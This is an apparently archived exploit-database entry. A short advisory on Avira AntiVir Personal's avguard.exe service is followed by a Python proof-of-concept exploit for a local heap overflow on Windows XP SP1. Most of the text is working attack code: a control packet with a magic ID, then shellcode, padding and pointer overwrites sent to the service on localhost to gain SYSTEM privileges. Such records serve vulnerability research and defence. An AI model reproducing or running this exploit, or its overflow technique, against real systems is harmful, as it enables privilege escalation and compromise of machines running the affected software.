source: https://www.securityfocus.com/bid/45807/info Avira AntiVir Personal is prone to multiple code-execution vulnerabilities. Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions. Please note that these issues affect versions of the application that are no longer supported. # # Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow # Proof of Concept (PoC) exploit / target: WinXP SP1 # bug discovered/exploit written by D.Elser # # by sending two simple TCP packets which will # exploit a vulnerability in the Antivir guard # service, the user will gain SYSTEM privileges # # this PoC code will cause the avguard service # to show a messagebox within an infinite loop from socket import * import sys # the first packet which is sent must # contain a magic ID at offset 0x18 # and the length of the second packet # to receive # # offset 0x18 : magic ID # offset 0x1C : length of buffer for second packet cpacket = "\x00\x00\x00\x00" \ "\x00\x00\x00\x00" \ "\x00\x00\x00\x00" \ "\x00\x00\x00\x00" \ "\x00\x00\x00\x00" \ "\x00\x00\x00\x00" \ "\x00\x00\x31\x06" \ "\x00\x00\x00\x40" lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \ "\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \ "\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \ "\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \ "\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \ "\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \ "\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \ "\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \ "\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \ "\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \ "\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \ "\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \ "\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \ "\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \ "\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \ "\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \ "\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \ "\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \ "\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \ "\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \ "\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \ "\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \ "\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \ "\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \ "\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \ "\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \ "\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \ "\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \ "\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \ "\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \ "\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \ "\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \ "\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00" # main part of shellcode shellcode = "\x90\x8d\x46\x1b" \ "\x50\x05\x04\x00" \ "\x00\x00\x50\x05" \ "\x19\x00\x00\x00" \ "\x50\xb8\x2f\x71" \ "\x42\x00\xff\xd0" \ "\x90\xeb\xe5\x10" \ "\x20\x01\x00" \ "I got SYSTEM privileges!\x00" + lyrics # fill shellcode up to a specific length for i in range(0, 0x4000 - 0x20 - len(shellcode)): shellcode = shellcode + "\x40" # second part of shellcode which contains # the pointers to be overwritten and code # which jumps to main part of our shellcode shellcode = shellcode + "\xEB\x0E\x90\x90" \ "\x90\x90\x90\x90" \ "\x52\xBF\x04\x78" \ "\xB4\x73\xED\x77" \ "\x8B\x57\x6C\x8B" \ "\xF2\x81\xEE\xE0" \ "\x3F\x00\x00\xFF" \ "\xE6\x90\x90\x90" \ "\x90\x90\x90\x90" \ "\x90\x90\x90\x90" \ s = socket(AF_INET,SOCK_STREAM) s.settimeout(1) s.connect(("127.0.0.1",18350)) print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \ "Exploit compatible with XP SP1.\n" print "Sending control packet (size: 0x%x)" % (len(cpacket)) s.sendall(cpacket) print "Sending shellcode packet (size: 0x%x)" % (len(shellcode)) s.sendall(shellcode) print "avguard response:" print s.recv(1024) sys.exit()